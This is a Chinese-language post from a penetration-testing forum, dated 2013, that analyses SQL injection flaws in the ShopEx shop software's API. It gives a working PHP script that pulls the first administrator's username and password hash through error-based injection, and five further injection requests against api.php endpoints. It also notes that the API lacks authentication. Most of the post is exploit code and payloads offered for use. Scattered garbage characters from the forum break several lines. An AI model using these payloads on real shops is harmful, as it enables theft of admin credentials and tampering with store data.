中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php/ R) I. ]& U8 {8 c, y
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php) C9 l4 i. A2 X

+ c  o# Z5 r+ i' ], k" z6 L第44行 $data['columns'] 未做过滤导致注入
7 {5 R3 c6 Y" {4 o# l. I4 v
# H/ B/ k+ u3 D, o8 s' P7 [<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
% v, y3 U0 Q; l7 f: @# [, S. y, v  P4 q+ P
注射1:
7 W* K' K2 D- u4 [; {0 b
2 y3 R% G5 U7 [http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#  v3 H2 M. F3 o- Y' A8 E7 G

2 }! Z# @3 @$ y0 P0 i; S( [2 v9 D注射2:
9 P& y) U  W8 rhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
5 v5 l" o9 Y7 N5 Y8 Z
" F9 y  {* H6 G" R/ ]注射3:7 g5 s2 r2 ^9 [3 o  x. G
  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx$ r5 ?: i1 j' h! I
注射4:+ Z/ u) u; n+ k& P% u6 c6 i& b

! s, G% Z2 Z) }( m0 k& q: Uhttp://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=14 Z2 A  e$ Q$ Y; Z4 W2 h& H1 D, h

* A, v7 q; |6 X, ]! v9 c& e1 I7 {) o2 J
注射5:- m- S5 {+ T& [3 Y- T
  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
% w) Z( ~7 X1 h$ G' u+ M) H9 v+ U+ ?0 }' f2 a
4 D3 @: A7 ?- ?. `/ H

- ]+ \- Q2 D8 `9 I
7 z4 S' l/ ~2 Q" Y4 J& F: \
/ W+ M$ v2 c/ M3 i- \9 T  {7 q! Q( m$ T6 I





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2